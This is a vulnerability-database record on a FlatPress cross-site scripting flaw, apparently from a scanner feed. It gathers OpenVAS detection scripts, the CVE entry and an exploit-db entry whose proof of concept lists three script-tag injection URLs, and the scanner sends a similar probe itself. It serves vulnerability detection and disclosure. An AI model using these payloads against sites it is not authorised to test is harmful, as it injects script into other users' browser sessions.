FlatPress Multiple Cross site Scripting Vulnerabilities
2010-01-22T00:00:00
ID OPENVAS:800284 Type openvas Reporter Copyright (c) 2010 Greenbone Networks GmbH Modified 2017-02-16T00:00:00
Description
This host is running FlatPress and is prone to multiple Cross Site
Scripting vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_flatpress_mult_xss_vuln.nasl 5306 2017-02-16 09:00:16Z teissa $
#
# FlatPress Multiple Cross site Scripting Vulnerabilities
#
# Authors:
# Madhuri D <dmadhuri@secpod.com>
#
# Copyright:
# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Advisory text attached to every finding. The description block below passes
# each of these variables to script_tag().

# Impact: injected script or HTML runs in the victim's browser session in the
# context of the affected site.
tag_impact = "Successful exploitation will let the remote attacker to execute arbitrary web
script or HTML code in a user's browser session in the context of an affected
site.
Impact Level: Application";
# Affected releases; the version fallback at the end of the script compares
# the detected version against the same 0.909 boundary.
tag_affected = "FlatPress version 0.909 and prior.";
# Root cause as given by the advisory: three scripts output PATH_INFO without
# sufficient sanitization.
tag_insight = "The flaws are due to error in 'contact.php','login.php' and
'search.php' that fail to sufficiently sanitize user-supplied data via the
PATH_INFO.";
# Remediation: the fixed release and where to obtain it.
tag_solution = "Upgrade to FlatPress version 0.909.1,
For updates refer to http://sourceforge.net/projects/flatpress/files/";
# One-line summary shown with the result.
tag_summary = "This host is running FlatPress and is prone to multiple Cross Site
Scripting vulnerabilities.";
# Registration pass: when 'description' is set, only the metadata below is
# recorded and the script exits at the end of this block, before any request
# is made.
if (description) {
  # Identity and revision bookkeeping.
  script_id(800284);
  script_version("$Revision: 5306 $");
  script_tag(name:"last_modification", value:"$Date: 2017-02-16 10:00:16 +0100 (Thu, 16 Feb 2017) $");
  script_tag(name:"creation_date", value:"2010-01-22 09:23:45 +0100 (Fri, 22 Jan 2010)");

  # Severity and external references for the issue.
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_cve_id("CVE-2009-4461");
  script_bugtraq_id(37471);
  script_name("FlatPress Multiple Cross site Scripting Vulnerabilities");
  script_xref(name:"URL", value:"http://secunia.com/advisories/37938");
  script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/10688");

  # NOTE(review): qod_type is "remote_vul", but the fallback at the end of the
  # script reports on the detected version string alone - confirm the QoD is
  # appropriate for that path.
  script_tag(name:"qod_type", value:"remote_vul");
  # ACT_MIXED_ATTACK: the body sends an XSS probe only when safe_checks() is
  # off, and otherwise relies on the version comparison.
  script_category(ACT_MIXED_ATTACK);
  script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
  script_family("Web application abuses");

  # Run after the FlatPress detection plugin (presumably the source of the
  # www/<port>/flatpress KB entry read below) and only against web ports.
  script_dependencies("flatpress_detect.nasl");
  script_require_ports("Services/www", 80);

  # Advisory text defined at the top of the file.
  script_tag(name:"impact", value:tag_impact);
  script_tag(name:"affected", value:tag_affected);
  script_tag(name:"insight", value:tag_insight);
  script_tag(name:"solution", value:tag_solution);
  script_tag(name:"summary", value:tag_summary);
  exit(0);
}
include("version_func.inc");
include("http_func.inc");
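# Resolve the web server port; without one there is nothing to test.
fpPort = get_http_port(default:80);
if(!fpPort){
  exit(0);
}

# KB entry for a FlatPress install on this port; absent means no FlatPress
# was recorded for it, so stop.
flatVer = get_kb_item("www/" + fpPort + "/flatpress");
if(!flatVer){
  exit(0);
}

# Split "<version> under <dir>": flatVer[1] is the version and flatVer[2] the
# install directory. Both are NULL-checked before use below.
flatVer = eregmatch(pattern:"^(.+) under (/.*)$", string:flatVer);

# Active check. It runs only when safe checks are disabled, because it sends a
# script-tag marker in the request path and looks for it in the response.
# Only contact.php is probed; login.php and search.php are covered by the
# version fallback alone.
if(!safe_checks() && flatVer[2] != NULL)
{
  # The pattern above allows the directory to be just "/"; use an empty prefix
  # in that case so the request path does not begin with "//".
  fpDir = flatVer[2];
  if(fpDir == "/"){
    fpDir = "";
  }

  sndReq = http_get(item:string(fpDir, "/contact.php/>'><ScRiPt>" +
                    "alert('+213567778899')</ScRiPt>"), port:fpPort);
  rcvRes = http_send_recv(port:fpPort, data:sndReq);

  # Vulnerable when a 200 response carries the marker back unencoded.
  # NOTE(review): the response Content-Type is not checked, so a reflection in
  # a non-HTML body would also match.
  if(rcvRes =~ "HTTP/1\.. 200" && ("<ScRiPt>alert('+213567778899')</ScRiPt>" >< rcvRes))
  {
    security_message(fpPort);
    exit(0);
  }
}

# Version fallback: reached when the active check was skipped or found no
# reflection. It reports on the detected version string alone, so an install
# patched without a version change may still be flagged.
if(flatVer[1] != NULL)
{
  if(version_is_less_equal(version:flatVer[1], test_version:"0.909")){
    security_message(fpPort);
  }
}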
{"id": "OPENVAS:800284", "type": "openvas", "bulletinFamily": "scanner", "title": "FlatPress Multiple Cross site Scripting Vulnerabilities", "description": "This host is running FlatPress and is prone to multiple Cross Site\n Scripting vulnerabilities.", "published": "2010-01-22T00:00:00", "modified": "2017-02-16T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=800284", "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "references": ["http://secunia.com/advisories/37938", "http://www.exploit-db.com/exploits/10688"], "cvelist": ["CVE-2009-4461"], "lastseen": "2017-07-02T21:09:51", "viewCount": 1, "enchantments": {"score": {"value": 4.7, "vector": "NONE", "modified": "2017-07-02T21:09:51", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4461"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310800284"]}, {"type": "exploitdb", "idList": ["EDB-ID:10688"]}], "modified": "2017-07-02T21:09:51", "rev": 2}, "vulnersScore": 4.7}, "pluginID": "800284", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_flatpress_mult_xss_vuln.nasl 5306 2017-02-16 09:00:16Z teissa $\n#\n# FlatPress Multiple Cross site Scripting Vulnerabilities\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the remote attacker to execute arbitrary web\n script or HTML code in a user's browser session in the context of an affected\n site.\n Impact Level: Application\";\ntag_affected = \"FlatPress version 0.909 and prior.\";\ntag_insight = \"The flaws are due to error in 'contact.php','login.php' and\n 'search.php' that fail to sufficiently sanitize user-supplied data via the\n PATH_INFO.\";\ntag_solution = \"Upgrade to FlatPress version 0.909.1,\nFor updates refer to http://sourceforge.net/projects/flatpress/files/\";\ntag_summary = \"This host is running FlatPress and is prone to multiple Cross Site\n Scripting vulnerabilities.\";\n\nif(description)\n{\n script_id(800284);\n script_version(\"$Revision: 5306 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-16 10:00:16 +0100 (Thu, 16 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-22 09:23:45 +0100 (Fri, 22 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2009-4461\");\n script_bugtraq_id(37471);\n script_name(\"FlatPress Multiple Cross site Scripting Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/37938\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/10688\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_MIXED_ATTACK);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n 
script_dependencies(\"flatpress_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"http_func.inc\");\n\nfpPort = get_http_port(default:80);\nif(!fpPort){\n exit(0);\n}\n\nflatVer = get_kb_item(\"www/\" + fpPort + \"/flatpress\");\nif(!flatVer){\n exit(0);\n}\n\nflatVer = eregmatch(pattern:\"^(.+) under (/.*)$\", string:flatVer);\nif(!safe_checks() && flatVer[2] != NULL)\n{\n sndReq = http_get(item:string(flatVer[2], \"/contact.php/>'><ScRiPt>\" +\n \"alert('+213567778899')</ScRiPt>\"), port:fpPort);\n rcvRes = http_send_recv(port:fpPort, data:sndReq);\n if(rcvRes =~ \"HTTP/1\\.. 200\" && (\"<ScRiPt>alert('+213567778899')</ScRiPt>\" >< rcvRes))\n {\n security_message(fpPort);\n exit(0);\n }\n}\n\nif(flatVer[1] != NULL)\n{\n if(version_is_less_equal(version:flatVer[1], test_version:\"0.909\")){\n security_message(fpPort);\n }\n}\n", "naslFamily": "Web application abuses"}
{"cve": [{"lastseen": "2021-02-02T05:40:08", "description": "Multiple cross-site scripting (XSS) vulnerabilities in FlatPress 0.909 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) contact.php, (2) login.php, and (3) search.php.", "edition": 4, "cvss3": {}, "published": "2009-12-30T20:00:00", "title": "CVE-2009-4461", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4461"], "modified": "2009-12-30T20:00:00", "cpe": ["cpe:/a:flatpress:flatpress:0.909"], "id": "CVE-2009-4461", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4461", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:flatpress:flatpress:0.909:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-04-27T19:23:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4461"], "description": "This host is running FlatPress and is prone to multiple Cross Site Scripting\nvulnerabilities.", "modified": "2020-04-23T00:00:00", "published": "2010-01-22T00:00:00", "id": "OPENVAS:1361412562310800284", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800284", "type": "openvas", "title": "FlatPress Multiple Cross site Scripting Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# FlatPress Multiple Cross site Scripting Vulnerabilities\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone 
Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:flatpress:flatpress\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800284\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-01-22 09:23:45 +0100 (Fri, 22 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2009-4461\");\n script_bugtraq_id(37471);\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"FlatPress Multiple Cross site Scripting Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37938\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/10688\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"flatpress_detect.nasl\");\n script_mandatory_keys(\"flatpress/installed\");\n\n script_tag(name:\"impact\", value:\"Successful 
exploitation will let the remote attacker to execute arbitrary web\nscript or HTML code in a user's browser session in the context of an affected site.\");\n\n script_tag(name:\"affected\", value:\"FlatPress version 0.909 and prior.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to error in 'contact.php', 'login.php' and 'search.php'\nthat fail to sufficiently sanitize user-supplied data via the PATH_INFO.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to FlatPress version 0.909.1.\");\n\n script_tag(name:\"summary\", value:\"This host is running FlatPress and is prone to multiple Cross Site Scripting\nvulnerabilities.\");\n\n script_xref(name:\"URL\", value:\"http://sourceforge.net/projects/flatpress/files/\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"http_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_less_equal(version: version, test_version: \"0.909\")) {\n report = report_fixed_ver(installed_version:version, vulnerable_range:\"Less than or equal to 0.909\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-02-01T12:59:00", "description": "FlatPress Cross Site Scripting Vulnerability. CVE-2009-4461. 
Webapps exploit for php platform", "published": "2009-12-26T00:00:00", "type": "exploitdb", "title": "FlatPress Cross-Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4461"], "modified": "2009-12-26T00:00:00", "id": "EDB-ID:10688", "href": "https://www.exploit-db.com/exploits/10688/", "sourceData": "======================================================================================== \r\n| # Title : FlatPress Cross Site Scripting Vulnerability |\r\n| # Author : indoushka |\r\n| # email : indoushka@hotmail.com |\r\n| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |\r\n| # Web Site : www.iq-ty.com |\r\n| # Script : powered by FlatPress / http://www.flatpress.org/ |\r\n| # Tested on: windows SP2 Fran\u0e23\u0e07ais V.(Pnx2 2.0) + Lunix Fran\u0e23\u0e07ais v.(9.4 Ubuntu) |\r\n| # Bug : XSS | \r\n====================== Exploit By indoushka =================================\r\n| # Exploit : \r\n| \r\n| 1- http://server/flatpress/contact.php/>\"><ScRiPt>alert(+213771818860)</ScRiPt>\r\n| 2- http://server/flatpress/login.php/>\"><ScRiPt>alert(+213771818860)</ScRiPt>\r\n| 3- http://server/flatpress/search.php/>\"><ScRiPt>alert(+213771818860)</ScRiPt>\r\n|\r\n================================ Dz-Ghost Team ========================================\r\nGreetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |\r\n-------------------------------------------------------------------------------------------\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/10688/"}]}